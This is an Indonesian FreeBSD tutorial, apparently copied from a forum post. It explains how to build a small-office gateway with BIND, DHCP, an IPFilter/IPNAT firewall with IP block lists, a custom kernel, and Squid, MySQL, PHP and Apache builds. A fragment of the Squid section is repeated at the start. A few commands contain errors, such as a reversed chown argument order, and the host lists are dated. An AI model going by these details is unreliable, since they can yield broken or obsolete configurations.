--bindir=\${prefix}/sbin \
--libexecdir=\${prefix}/libexec \
--sysconfdir=\${prefix}/etc/squid \

#parameter lain yang mungkin perlu:
--enable-storeio="ufs diskd null" \
--enable-removal-policies="lru heap" \

#parameter tambahan:
--localstatedir=\${prefix}/squid \
--host=i686 \
--disable-ident-lookups \
--disable-wccp \
--enable-kill-parent-hack \
--enable-time-hack \
--with-pthreads

make all; make install

Dengan parameter diatas kita akan memperoleh konfigurasi squid yang mirip seperti jika kita menginstalnya melalui package.
Kemudian file logs dan cache di direktori /usr/local/etc/squid di chown nobody:nogroup (atau sesuai dengan usernya jika telah dibuat user untuk squid, seperti user mysql dibawah).
Setelah itu kita buat intial cache directory dengan menjalankan: squid -z. Default cache size adalah 100MB.

==Konfigurasi MySQL, PHP dan Apache==

==MySQL==

/configure \
--localstatedir=/var/db/mysql \
--with-unix-socket-path=/var/run/mysql.sock \
--host=i686 \
--enable-assembler \
--with-libwrap \
--with-berkeley-db \
--with-named-z-lib \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static \
--without-debug \
--without-bench \
--without-docs \
--without-readline

make; make install

Tambahkan user mysql dengan ID misalkan = 3036

pw add group mysql -g 3036
pw add user mysql -u mysql -g mysql -wno -s /sbin/nologint -d /var/db/mysql -c "MySQL"

Direktori localstatedir (/var/db/mysql) diatas, *harus* read/write by user mysql:
chown -R /var/db/mysql mysql:mysql

==PHP==
Sebelumnya kita harus cd ke source apache dulu: cd /usr/local/src/apache, lalu jalankan ./configure (plain).

Kemudian baru cd ke source php: cd /usr/local/src/php dan mengkonfigurasi php sesuai preferensi kita.

/configure \
--build=i686 \
--prefix=/usr/local \
--with-mysql=/usr/local \
--with-apache=../apache \
--with-pcre-regex=/usr/local \
--with-mcrypt \
--with-zlib \
--with-ftp \
--enable-track-vars \
--enable-ctype

make; make install

==Apache==

/configure \
--enable-module=most \
--enable-shared=max \
--server-uid=www \
--server-gid=www \
--activate-module=src/modules/php4/libphp4.a

make; make install

==Penutup==

Sesuai dengan tujuan utama tulisan ini, beberapa sub-sistem mungkin hanya sedikit atau sama sekali tidak dibahas, bagian-bagian tersebut dianggap sesuai dengan instalasi default.
Terakhir, penulis dengan senang hati akan menerima kritik dan saran dari pembaca semua, semoga ada manfaatnya.

aa, aa.delphi@yahoo.com

URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global

2008-07-27T03:55:04Z

Aa: /* File domain.db: */

Sumber: aa, aa.delphi@yahoo.com
URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Dalam tulisan ini akan dibahas (mudah-mudahan) secara cukup detail, bagaimana mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global, baik dinamik maupun statik (dial-up PPP, Cable-Modem atau DSL).

Model network seperti ini merupakan model yang sangat umum digunakan oleh warnet serta perusahaan kecil yang berniat untuk memberikan akses internet yang murah meriah bagi para karyawannya.

Teknik yang akan dibahas ini merupakan salah satu (mungkin merupakan yang terbaik) dibandingkan dengan alternatif lainnya seperti menggunakan hardware tertentu (modem dengan kapabilitas internet sharing), kelemahan: jumlah host sangat terbatas, antara 2 - 8, serta fleksibilitasnya sangat rendah, hampir tanpa menggunakan pengamanan dari intruder.

Pilihan lainnya adalah dengan sistem operasi MS Windows (yang sudah sangat familiar), fleksibilitas cukup, namun dengan tingkat pengamanan yang relatif rendah.

Pilihan OS lainnya seperti Linux, OpenBSD atau Solaris bisa juga diperhitungkan, namun overall performance, kombinasi FreeBSD dan IPF adalah yang terbaik dinilai dari segi keamanan/security, performansi, dukungan resources (software, kompatibilitas, utilitas dan dokumentasi) yang tersedia, serta biaya yang dibutuhkan. Dengan FreeBSD mesin 386 tua milik kita disulap menjadi sebuah server yang powerful, robust dan tahan banting.

cat: IPF (IPFilter) adalah paket firewal native dari OpenBSD, sistem operasi yang selama ini dinilai sebagai salah satu OS yang dianggap paling secure.

==Topologi Network==
<pre>
===============================================

_____
| ISP |
|_____|
DNS: 202.155.0.10, 202.155.0.20
|
| 10.20.30.40
___|___
|FreeBSD|...........
|_______| Virtual-Host 192.168.2.1
my.domain.box| Gateway
192.168.1.1 | Firewall - IPF/IPNAT
| DNS Server - BIND
Network: | HTTP Server - Apache
192.168.1.0 | Proxy Server - Squid
255.255.255.0| SQL Server - MySQL
|
|
_________|____...___
| | | |
__|__ __|__ __|__ __|__
Host1 Host2 Host3 HostN
</pre>

Ada 3 pokok bahasan utama dalam kasus ini.
# DNS
# DHCP Server
# IPF/IPNAT

lain-lain: Apache, MySQL dan Squid tidak akan dibahas panjang karena tidak esensial dalam konteks ini.

==DNS==

Untuk mengaktifkan name server jalankan /stand/sysinstal pilih menu Configure, kemudian Startup, lalu aktifkan (enable) named. Jika anda ingin menjalankan named dalam sandbox, isi named flags dengan argumen seperti dalam uraian butir 1.3.

Cara lainnya adalah dengan mengedit langsung /etc/rc.conf, ganti atau tambahkan entri di

/etc/rc.conf:
named_enable="yes"
named_flags="" #lihat uraian selanjutnya

==Cache-Only DNS Server==

Konfigurasi DNS yang paling sederhana, yang kemungkinan besar akan berjalan lancar adalah menggunakan konfigurasi jenis cache-only DNS Server, artinya server DNS kita TIDAK memiliki otoritas atas satu zone-pun juga kecuali localhost dan loopback network 127.

Kekurangan dari model DNS Server seperti ini adalah, tentu saja, host-host dalam network kita tidak dapat saling mengenal. Hal ini bisa kita uji dengan perintah ping dari satu host terhadap host lainnya.

cat.: Dalam terminologi BIND, zone adalah suatu area network dimana sebuah server DNS memiliki otoritas atas pengaturan nama atas host-host yang ada di dalamnya.

Untuk network yang relatif sederhana seperti pada small-office atau di organisasi kecil, suatu zone umumnya hanya berupa satu domain, sementara di organisasi yang cukup besar, seperti di lingkungan kampus dan terutama di sebuah ISP, biasanya sebuah server DNS akan menangani suatu zone yang terdiri atas lebih dari satu domain.

==Konfigurasi dalam named.conf==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP kita misalnya:
202.155.0.10;
202.155.0.20;
};
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

zone "." {
type hint;
file "root.servers";
};
</pre>

==File-file database==

==File localhost.rev:==

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.
1 IN PTR localhost.domain.box.

cat.: Untuk menghindari salah ketik, sebaiknya kita cukup menjalankan perintah: sh make-localhost di direktori /etc/namedb.

==File root.servers:==
File ini tidak perlu dirubah, biarkan saja sesuai defaultnya.

==Internal-Root DNS Server==
Seperti dapat dilihat pada gambar diatas, network kita termasuk kedalam network kelas C, dengan alamat 192.168.1.0 dan netmask 255.255.255.0. IP address network card pertama (if_1) ditetapkan oleh ISP, sementara if_2 dapat kita tentukan sendiri.

Selanjutnya kita dapat menetapkan hal-hal sebagai berikut:

Zone/domain: domain.box
Reverse-Network: 1.168.192.in-addr.arpa
Server address: 192.168.1.1
Server name: my.domain.box

==Konfigurasi dalam named.conf:==

==Konfigurasi awal (Cache-Only DNS Server):==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP:
202.155.0.10;
202.155.0.20;
};
version "19.09.1969";
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};
</pre>

==Konfigurasi named.conf yang perlu ditambahkan (atau dirubah):==
<pre>
forward;

zone "domain.box" {
type master;
file "box/domain.db";
};

zone "1.168.192.in-addr.arpa" {
type master;
file "box/domain.rev";
};

zone "." {
type hint;
//file "root.servers";
file "box/root.box";
};
</pre>

==File-file database==

==File localhost.rev:==

Tidak perlu ada perubahan dalam file ini, sama dengan butir 1.1.2.1 diatas.

==File domain.db:==

Berisi daftar translasi name to address untuk seluruh host yang ada di domain domain.box, hati-hati character comment di sini adalah semi-colon (;) bukan hash (#).
<pre>
@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

localhost IN A 127.0.0.1

my IN A 192.168.1.1
host1 in cname my
host2 IN A 192.168.1.2
host3 IN A 192.168.1.3
..
..
..
host254 IN A 192.168.1.254
</pre>

cat.: Perhatikan bahwa dalam database ini kita perlu menambahkan entri untuk localhost, sehingga setiap rujukan atas localhost, dari manapun juga, akan diarahkan ke loopback masing-masing.

==File domain.rev:==
Kebalikan dari domain.db, merupakan reverse address to name atas domain.box untuk network 192.168.1.0/24

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

1 IN PTR my
2 IN PTR host1
3 IN PTR host2
..
254 IN PTR host254

cat.: Perhatikan bahwa tidak bisa dilakukan reverse untuk alias atau CNAME (canonical-name). Tidak diperbolehkan terdapat *dua entri yang sama* untuk *satu nomor address*, atau dengan kata lain, satu nomor adress tidak boleh merujuk kepada dua nama yang berbeda. Sebaliknya bisa saja terdapat dua nomor address untuk satu nama, misalnya jika kita memiliki dua atau lebih network card dalam satu host yang masing-masing memiliki IP sendiri.

==File root.box:==

File ini merupakan modifikasi dari file root.servers, yaitu dengan menambahkan RR (Resource Record) yang menyatakan bahwa server kita memiliki otoritas atas root domain.

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

;domain "domain.box" didelegasikan langsung dari root
domain.box. 9999999 IN NS my.domain.box.

;juga reverse dari class-C network
1.168.192.in-addr.arpa 9999999 IN NS my.domain.box.

;glue records
my.domain.box. IN A 192.168.1.1

;daftar root server selanjutnya sama dengan default di file root.servers
..

==DNS Server in the sand-box==

Konfigurasi server DNS ini terutama ditujukan untuk memperketat sekuriti sistem network, prinsipnya sederhana, yaitu menjalankan servis DNS (named) oleh non-privilege user, untuk ini biasanya sengaja dibuat satu user khusus, tanpa fasilitas login.
Sebenarnya untuk model network kita yang sederhana, ancaman sekuriti yang ada mungkin tidak akan terlalu serius. Konfigurasi ini bisa jadi sebagai opsi yang bisa diambil ataupun tidak.

1.3.1
Buat user baru untuk servis DNS, misalnya dengan nama: bind.
User group: bind (default)
User home: /usr/local/bind
shell: no, nologin atau nonexistent

1.3.2
ganti atau tambahkan entri di /etc/rc.conf:
named_flags="-u bind -g bind -w /usr/local/bind -c named.conf -t /usr/local/bind"

Penjelasan atas argumen:
-u dan -g: user serta group yang menjalankan servis DNS adalah "bind".
-w dan -c: direktori kerja dan nama file konfigurasi yang dipakai.
-t: setelah melakukan inisialisasi, servis DNS menjadikan /usr/local/bind
sebagai root direktorinya (chroot).

Dengan penggantian user, group dan chroot, servis DNS ini tidak lagi memiliki akses tak-terbatas atas resources, sehingga perlu dilakukan lagi beberapa penyesuaian:

1.3.2.1

Servis named dan ndc biasanya menampilkan prosess-id-nya dibawah sub-direktori /var/run, karena root-directory-nya berubah, maka kita harus membuat secara manual subdirektori /var/run dibawah /usr/local/bind, jangan lupa ownershipnya harus disesuaikan menjadi bind:bind

1.3.2.1

Jika penyesuaian sub-direktori diatas tidak dilakukan maka setidaknya harus dibuat penyesuaian dalam option named.conf:
[pre]
options {
...

directory "/"; //(atau mudahnya hapus saja option ini)
pid-file "named.pid" //named.pid berada di direktori root yang baru

...
}
[/pre]

1.3.3

Pindahkan atau salin /etc/namedb ke /usr/local/bind.

cat.: Perhatikan ownership dari /usr/local/bind, jika kita menyalinnya dengan tool atau file-manager seperti midnight- commander, biasanya ownership akan berubah dari bind ke root (atau privileged user pada saat itu), sehingga harus dikembalikan lagi dengan chown -r bind:bind /usr/local/bind.

Penyesuaian ownership ini juga berlaku untuk direktori baru dibawahnya yang kelak digunakan untuk file-file yang meminta akses-tulis seperti log, dump, stat, pid, dsb.

1.3.4
[pre]
Hentikan proses named yang saat itu berlangsung (dengan kill, killall atau top), lalu aktifkan kembali named (dengan argumen seperti named_flags diatas), atau reboot server.
[/pre]

2. DHCP Server

2.1. Instalasi dan Setup

Dengan /stand/sysinstall, install package isc-dhcpd.
Instalasi ini hanya sekedar mengekstrak program dan dokumentasi dhcpd, kita *harus* membuat sebuah file yaitu /var/db/dhcpd.lease secara manual: touch /var/db/dhcpd.leases.
Edit file /usr/local/etc/dhcpd.conf dengan editor kesayangan anda, fi-ay :), dan buat alokasi dinamis IP addresses untuk network 192.168.1.0/24 misalnya:

#jangan lupa menggunakan fasilitas syslog
#dalam syslog.conf tambahkan entry sbb:
# local7* /var/log/dhcpd.log #awas: pake TAB, jangan pake spasi!

log-facility local7;
authoritative;
ddns-update-style ad-hoc;

option domain-name "domain.box";

subnet 192.168.1.0 netmask 255.255.255.0 {
option netbios-name-servers 192.168.1.3; #server NT kita
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
pool { range 192.168.1.10 192.168.1.190; }
}

2.2. Menjalankan dhcpd
DHCP server sebaiknya dijalankan pada saat boot-up dengan membuat file startup di /usr/local/etc/rc.d
Untuk menjalankan secara manual ketikan perintah: dhcpd if_2 (if_2 adalah interface yang terhubung dengan network lokal)

3.IPF/IPNAT

'Official' firewall dari FreeBSD adalah ipfw/natd, kelebihan ipfw terutama adalah kemampuan untuk mengatur kuota bandwith, sementara kelebihan ipf/ipnat yang paling utama adalah performansi. Juga menurut authornya, ipf benar-benar melakukan kontrol terhadap TCP/IP state, tidak cuma artifisial (sekedar mengecek kombinasi flags tertentu seperti SYN/ACK) seperti yang dilakukan dalam paket firewall lainnya.

Dalam bahasan kali ini, kita akan menggunakan IPFilter/IPNAT.

3.1. Kompilasi kernel

Untuk memasang firewall kita harus mengkompile ulang kernel (selanjutnya kita bisa mencopot-pasang lagi lewat loadable kernel module).

3.1.1 Konfigurasi kernel

cd /usr/src/sys/i386/conf
option tambahan kernel kita dari GENERIC adalah sbb:

#--- start kernel options ---
#hapus semua options cpu kecuali model tertinggi sesuai cpu anda
#cpu I386_CPU
#cpu I486_CPU
#cpu I586_CPU
cpu I686_CPU
maxusers 32

#kostumisasi kernel (lihat juga catatan tambahan)
ident AA
makeoptions KERNEL=AA

#jangan lupa mengganti entri di /boot atau /etc/defaults/rc.conf
#userconfig_script_load="YES"
#kernel="/AA"
#verbose_loading="YES"
#autoboot_delay="3"
#bootfile="AA,aa,kernel"

#kita tidak memakai 386SX kebawah, jadi emulasi mathco bisa dihapus saja
#options GPL_MATH_EMULATE #Support for x87 emulation

#console menggunakan teks mode 90x60
device vga0 at isa?
options VGA_WIDTH90 #90 baris VGA
options VESA

#jangan lupa nanti tambahkan font dan screenflags di /etc/rc.conf sbb:
#font8x14="cp437-8x14"
#font8x16="cp437-8x16"
#font8x8="cp437-8x8"
#allscreens_flags="VGA_90x60"

#hapus splash screen/screen saver.
#pseudo-device splash

#selain UFS, dalam box kita terdapat juga NTFS dan EXT2FS
options NTFS #NT
options EXT2FS #Linux
options NFS_NOSERVER #Membuang kode NFS

#options UNION #UFS bisa digabung
#options NULLFS #null
#options UMAPFS #UID Map FileSystem
#options KERNFS #kernel
#options SMBFS #SMB/File Sharing ala Windows
#options PROCFS #memetakan Process ID

# Tambahkan flags 0xb0ff (maks. drive blok transfer) untuk hard-disk
# untuk sepasang hard-disk per-interface flagsnya adalah 0xb0ffb0ff
device ata0 at isa? port IO_WD1 irq 14 flags 0xb0ffb0ff
device ata1 at isa? port IO_WD2 irq 15 flags 0xb0ffb0ff

options SOFTUPDATES #penting untuk meningkatkan performansi
options ATA_STATIC_ID #Static device numbering

#hapus saja tape-drive.
#device atapist # ATAPI tape drives

# jika menggunakan APM, sebaiknya tidak.
#device apm0 at nexus? disable flags 0x20 # Advanced Power Management

# PCCARD (PCMCIA) support, buang saja
#device card
#device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000
#device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable

#Buang saja serial 2 dan 3
#device sio2 at isa? disable port IO_COM3 irq 5
#device sio3 at isa? disable port IO_COM4 irq 9

#Buang juga koneksi lewat Parallel port
#device plip # TCP/IP over parallel
#device ppi # Parallel port interface device
#device vpo # Requires scbus and da

#Buang semua entri ethernet yang tidak ada
#saya cuma punya 3Com 3C509, 3C905 dan realtek
device ep # 3Com 3C509 (10 MBps)
device xl # 3Com 3c905 (10/100)
device rl # RealTek 8129/8139 (10/100)
#device de # Realtek lama (10)

#Banyak software yang tergantung kepada bpf
#(discouraged), tapi sebaiknya tetap dipasang
pseudo-device bpf #Berkeley packet filter

#Buang semua options USB yang hardwarenya tidak ada
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device usb # USB Bus (required)
device ugen # Generic
#device uhid # "Human Interface Devices"
#device ukbd # Keyboard
#device ulpt # Printer
#device umass # Disks/Mass storage - Requires scbus and da
#device ums # Mouse
#device uscanner # Scanners
# USB Ethernet, requires mii
#device aue # ADMtek USB ethernet
#device cue # CATC USB ethernet
#device kue # Kawasaki LSI USB ethernet

#Soundcard (generik)
device pcm

#jangan lupa nanti untuk membuat entri2 sound
#(audio, mixer, sequencer dll) di /dev:
#cd /dev
#./MAKEDEV snd

#Intel PIIX4 Power Management Unit
#device smbus
#device intpm

#Berhubung SCSI card saya sudah sangat kuno, akhirnya saya cabut :)
#Jika tidak memiliki SCSI, semua options yang behubungan dengan skasi
#bisa dibuang

#options SCSI_DELAY=8000 #Delay (in ms) before probing SCSI
# SCSI Controllers
#...
# SCSI peripherals
#...

#Jika menggunakan firewall bawaan FreeBSD:
#options IPFIREWALL
#options IPDIVERT
#options IPFIREWALL_VERBOSE
#options IPFIREWALL_VERBOSE_LIMIT=32
#options IPFIREWALL_DEFAULT_TO_ACCEPT

#Jika anda memasang bandwith quota tambahkan entri dibawah ini
#options IPDIVERT #digunakan juga oleh ipfw/natd
#options DUMMYNET
#options QUOTA

#Konfigurasi ipfilter/ipnat ini yang kita pakai
#cat. jika menggunakan IPFilter TIDAK PERLU ditambahkan
#lagi options IPDIVERT seperti yang terdapat dalam
#beberapa dokumentasi online

options IPFILTER
options IPFILTER_LOG
options IPFILTER_DEFAULT_BLOCK

#untuk memperketat firewall bisa ditambahkan options dibawah ini:
options IPSTEALTH
options TCP_DROP_SYNFIN
options TCP_RESTRICT_RST

options MROUTING
options RANDOM_IP_ID

#beberapa options lainnya untuk memacu performa
options NBUF=4096
options NMBCLUSTERS=8192

#catatan tambahan:

#Jika anda ingin mengubah release, copyright et-al., lakukan perubahan ini
#di /usr/src/sys/conf/newvers.sh

#dari original
#TYPE="FreeBSD"
#REVISION="4.3"
#BRANCH="RELEASE"
#RELEASE=4.3-RELEASE
#VERSION="${TYPE} ${RELEASE}"
if [ X"$COPYRIGHT" = X ]; then
COPYRIGHT="/*
* Copyright (c) $year
* FreeBSD Inc. All rights reserved.
*
*/"
fi

#menjadi violated
TYPE="mbakNunix"
REVISION="1.31"
BRANCH="BURIX"
RELEASE=1.31-BURIX
VERSION="${TYPE} ${RELEASE}"
COPYRIGHT="
/*** aa, aa.delphi@yahoo.com, 1995-$year ***/
"

2.1.2 Kompilasi

Akhirnya kita kompile kernel sbb:

su (kita harus root)
cd /usr/src/sys/i386/conf
chflags noschg AA (jika sekuriti diperketat, biasanya kernel diberi flag schg)

/usr/sbin/config -r AA && \
cd ../../compile/$1 && \
(make depend) 2>~/err1 && \
make 2>~/err2 && \
(make install) 2>~/err3

semua error message masing-masing akan dicatat di /root, file: err1, err2 dan err3

3.2. Mengkonfigurasi IPF/IPNAT

3.2.1. Konfigurasi rc.conf
Konfigurasi umum seperti biasa dilakukan di rc.conf

3.2.2. Konfigurasi syslog.conf

3.2.3. Tuning sysctl.conf
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1

3.2.4. ipnat.rules
Rules untuk IPNAT dibahas lebih dulu karena relatif jauh lebih sederhana daripada rules untuk IPF

Catatan:
map artinya: remap SOURCE packet's IP address
rdr artinya: redirect DESTINATION of packet's IP address

Tambahkan baris berikut untuk mengemap :) port ftp

map rl1 192.168.1.0/24 -> 0/32 proxy port 21 ftp/tcp
map rl1 192.168.1.0/24 -> 0/32 portmap tcp/udp 49152:65535 #nomor port bebas antara 0-65535
map rl1 192.168.1.0/24 -> 0/32

HTTP request di redirect ke server

rdr rl1 0/32 port 80 -> 192.168.1.1 port 80 tcp

#jika perlu permintaan http dari lokal bisa di redirect ke SQUID port 3128
#rdr rl0 0.0.0.0/0 port 80 -> 192.168.1.1 port 3128 tcp

3.2.5. ipf.rules

Default konfigurasi adalah block in all, block out all artinya dengan konfigurasi seperti ini server kita benar-benar jadi mahluk egois, tidak mau melihat kanan-kiri sedikitpun :)

konfigurasi paling sederhana yang bisa berjalan adalah:

pass in all
pass out all

Artinya sama saja dengan tidak memasang firewall.

jika server kita hanya digunakan untuk mengakses internet keluar (outward-only), cukup kita isi firewall rules dengan satu baris:

pass out quick all keep state keep frags

untuk ipf ver 4.32 (FreeBSD 4.5+) rule "keep" tidak bisa diterapkan kepada paket selain tcp/udp/icmp, jadi rule diatas dibagi menjadi:

pass out quick proto tcp/udp all keep state keep frags
pass out quick proto icmp all keep state keep frags
pass out quick all

Dengan menggunakan keep state, kita tinggal membuka port yang kita perlukan saja, lalu-lintas koneksi yang terkait dengan servis/port tsb selanjutnya ditangani oleh ipf, misalnya:

block in quick all
pass out quick proto icmp all icmp-type echo keep state

meski diatas terdapat block, icmp-reply akan tetap bisa masuk masuk karena memang diminta oleh icmp-echo.
pada protokol tcp/udp lainnya, pembukaan gerbang masuk ini mencakup juga control messages berupa icmp atau bahkan segmen IP dengan nomor port lainnya yang berbeda, yang masih terkait dalam koneksi tersebut.

catatan tambahan:
Sebaiknya keep-state jangan terlalu di-obral supaya tidak menghabiskan resources atau bahkan membuka celah security berupa Denial of Service (DoS) Attack, lebih tepat kiranya jika hanya protokol TCP dengan SYN Flag serta port-port tertentu saja yang dipasangi keep-state seperti FTP (21), SSH (22), SMTP (25), DNS (53), DHCP (67/58), serta ICMP echo.
Jika hanya permintaan koneksi (ditandai dengan SYN flag) dari servis/port tertentu yang dibuka, jalur masuk semua ditutup (block in all), port FTP mau tidak mau harus diberi keep state karena setelah koneksi terjadi dia akan membuka port/jalur baru (UDP port 20, atau TCP dengan unassigned [high number] port) untuk komunikasi data.

pass out quick proto tcp flags S keep state
pass out quick proto udp port = 53 keep state
pass out quick proto icmp all icmp-type echo keep state
pass out quick all

Karena pembahasan ipf ini cukup panjang, maka akan kita singkat saja dengan menggunakan rules yang berguna secara umum

[pre]
#UMUM
pass in quick on lo0
pass out quick on lo0

#NBNS
block return-rst in quick proto tcp all port 136 >< 140
block return-icmp-as-dest(port-unr) in quick all port 136 >< 140

#============================================================
#if_1 adalah eksternal interface (yang terhubung ke internet)
#============================================================

#INWARD
#------
block in quick on if_1 all head 10000
#Start group 10000

block in quick all with opt lsrr group 10000 #block loose src routing
block in quick all with opt ssrr group 10000 #block strict src routing
block in quick proto tcp all with frags group 10000

#block no. ip address yang diketahui berbahaya, bervirus dsb.
#block in quick proto tcp/udp from Danger_IPs group 10000
#(lihat daftar 3.2.5.2)

pass in quick proto tcp all port = http flags S keep state group 10000 #jika kita pasang web server

block in quick proto icmp all head 11000 group 10000 #blok icmp yang tidak perlu
#Start group 11000
#pass in log first quick proto icmp all icmp-type echo group 11000
pass in quick proto icmp all icmp-type echorep group 11000
pass in quick proto icmp all icmp-type unreach group 11000
pass in quick proto icmp all icmp-type redir group 11000
pass in quick proto icmp all icmp-type timex group 11000
block in return-icmp-as-dest(host-unr) in quick all group 11000
#End group 11000

#__________________________________________________
block return-rst in quick proto tcp all group 10000
block return-icmp-as-dest(port-unr) in quick all group 10000

#End group 10000

#OUTWARD bebas
#-------------
block out quick on if_1 all head 20000
pass out quick proto tcp/udp all keep state keep frags group 20000
pass out quick proto icmp all keep state keep frags 20000
pass out quick all 20000

#===========================================================
#if_2 adalah internal interface (yang terhubung ke intranet)
#===========================================================

#INWARD
#------
block in quick on if_2 all head 30000
#Start group 30000

#Test User, tahan uninitialized host
block in quick from !192.168.1.1/24 to any head 31000 group 30000
#Start group 31000

#Unknown User, harus daftar dhcp dulu
pass in log first quick proto tcp/udp from any port = 68 to any port = 67 group 31000
block return-icmp-as-dest(host-unk) in log first quick all group 31000 #Unknown

#HTTP
#Tahan dulu http untuk diinterogasi, mau kemanakah tujuannya.
block in log first quick all port = http head 32000 group 31000
#Start group 32000

#HTTP block template: popups, junker, spammer etc. dilarang!
block return-rst in log first quick proto tcp from any to 64.38.238.0/18 group 32000 #ADS!
block return-rst in log first quick proto tcp from any to 66.28.153.36/24 group 32000 #porn&spy!
#...dst (lihat daftar 3.2.5.1 yang berisi IP popups/spyies)

#aman...
pass in log first quick proto tcp all flags S keep state keep frags group 32000

#HTTP-TCP only, yg lainnya di-blok by default!
block return-rst in quick proto tcp all group 32000

#End group 32000
#End group 31000

#Pada tahap ini user telah dikenal (dari 192.168.1.1/24) dan dengan permintaan port selain http
#atau user dari 192.168.1.1/24 dengan port http namun protokolnya selain tcp

#Tahan permintaan DNS keluar
block return-icmp-as-dest(filter-prohib) in quick proto tcp/udp from any to 202.155.0.10/24 port = domain group 30000

pass in log first quick proto tcp/udp all port < 1024 keep state group 30000 #regular ports
pass in log first quick proto tcp/udp all port = 3130 keep state group 30000 #SQUID
pass in log first quick proto tcp/udp all port = 3306 keep state group 30000 #MySQL

#__________________________________________________
#lainnya secara default di-blok
block return-rst in quick proto tcp all group 30000
block return-icmp-as-dest(port-unr) in quick all group 30000

#End group 30000

#OUTWARD bebas
#-------------
block out quick on if_2 all head 40000
pass out quick proto tcp/udp all keep state keep frags 40000
pass out quick proto icmp all keep state keep frags 40000
pass out quick all 40000
[/pre]

3.2.5.1 Daftar alamat IP popup
Berikut ini daftar ip popup dan advertising banner, spy, spammer dll yang selain menyebalkan juga kadang berbahaya.
cat.: ganti kata "BLOK" dengan: "block return-rst in log first quick proto tcp from any to", juga nomor group disesuaikan dengan konfigurasi

#HTTP block template

#Hall Of Fames - top of sh*ts!-
BLOK 64.38.238.0/18 group 42000 #popups.ini
BLOK 64.38.223.51/24 group 42000 #!!!trafficcashgold.com
BLOK 64.38.226.6/24 group 42000 #maxcash.cavecreek.net
BLOK 64.38.247.60/24 group 42000 #count1-old.paycounter.com[]
BLOK 205.180.85.40/24 group 42000 #popups.ini TOP!!! media.fastclick.net
BLOK 202.180.8.129/24 group 42000 #ns1.servercyber.com
BLOK 207.68.178.251/24 group 42000 #ads.msn.com
BLOK 207.68.185.58/24 group 42000 #autosearch.msn.com
BLOK 207.68.171.254/24 group 42000 #adobe-spy
BLOK 207.68.172.253/24 group 42000 #adobe-spy
BLOK 207.68.173.254/22 group 42000 #adobe-spy
BLOK 209.225.0.6/24 group 42000 #servedby.advertising.com
BLOK 209.225.4.72/24 group 42000 #advertising.com

#telkom!dont-block: BLOK 203.130.252.36/24 group 42000 #mencurigakan sih

#dangerous!
BLOK 66.28.38.3/24 group 42000 #
BLOK 209.50.252.100/24 group 42000 #4bigcash.com
BLOK 209.5.187.10/24 group 42000 #freepopups.com
#BLOK 209.5.187.16/24 group 42000 #adpowerzone.com
#BLOK 213.249.1.67/24 group 42000 #d67.kif2.nas.panafonet.gr
#End dangerous

#from popups.ini
BLOK 12.42.235.3/24 group 42000 #popups.ini
#...long-list...
BLOK 216.95.228.15/24 group 42000 #popups.ini
#end-from popups.ini

#new compilation
#BLOK 66.206.15.201/24 group 42000 #indo-porn, gapapa-lah
BLOK 63.167.204.56/24 group 42000 #7adpower.com
#...long-list...
BLOK 128.11.42.61/24 group 42000 #burstnet.com
#dont-block-yahoo: BLOK 66.218.71.80/24 group 42000 #w1.scd.yahoo.com
#end-new compilation

#old compilation
BLOK 12.90.179.10/16 group 42000
BLOK 63.215.149.25/24 group 42000 #porno
BLOK 192.150.10.120/16 group 42000 #adobe spyier!!!
#...long-list...
BLOK 216.218.220.42/24 group 42000 #servergold.com - porn
#beware! Namezeroes are always peeking our nbns port!
BLOK 216.34.13.245 port != 80 group 42000

#end-old-compilation

3.2.5.2 Daftar alamat IP berbahaya
Berikut ini daftar alamat IP berbahaya karena menyebarkan virus nimda atau code-red hingga tulisan ini dibuat (mungkin IP anda tercantum disini, selamat! :)).
penggunaannya dalam ipf.rules misalnya:

block return-rst in log first quick on rl1 proto tcp from 202.10.35.227 to any Group 23456 #Nimda

4.47.218.144#code_red

#internal INDOSAT NET-10.X.X.X
10.1.8.108#nimda
10.6.2.4#nimda
#...long-list...
10.6.18.68#nimda
#end: internal INDOSAT NET-10.X.X.X

24.73.201.22#code_red
24.80.172.120#code_red
#...long-list...
24.196.16.168#code_red
219.8.104.74#nimda

4.Lain-lain
Dalam bagian ini diasumsikan bahwa kita akan menginstal program dari source kodenya, yang diekstrak ke direktori /usr/local/src, mis.: tar -xpvzf apache.tgz -C /usr/local/src.
bagian version number, jika ada, sebaiknya dihilangkan, mis.: mv apache-1.1.23pl8 apache

4.1. Squid
/configure --enable-ipf-transparent \

#parameter lain yang perlu:
--prefix=/usr/local \
--bindir=\${prefix}/sbin \
--libexecdir=\${prefix}/libexec \
--sysconfdir=\${prefix}/etc/squid \

#parameter lain yang mungkin perlu:
--enable-storeio="ufs diskd null" \
--enable-removal-policies="lru heap" \

#parameter tambahan:
--localstatedir=\${prefix}/squid \
--host=i686 \
--disable-ident-lookups \
--disable-wccp \
--enable-kill-parent-hack \
--enable-time-hack \
--with-pthreads

make all; make install

Dengan parameter diatas kita akan memperoleh konfigurasi squid yang mirip seperti jika kita menginstalnya melalui package.
Kemudian file logs dan cache di direktori /usr/local/etc/squid di chown nobody:nogroup (atau sesuai dengan usernya jika telah dibuat user untuk squid, seperti user mysql dibawah).
Setelah itu kita buat intial cache directory dengan menjalankan: squid -z. Default cache size adalah 100MB.

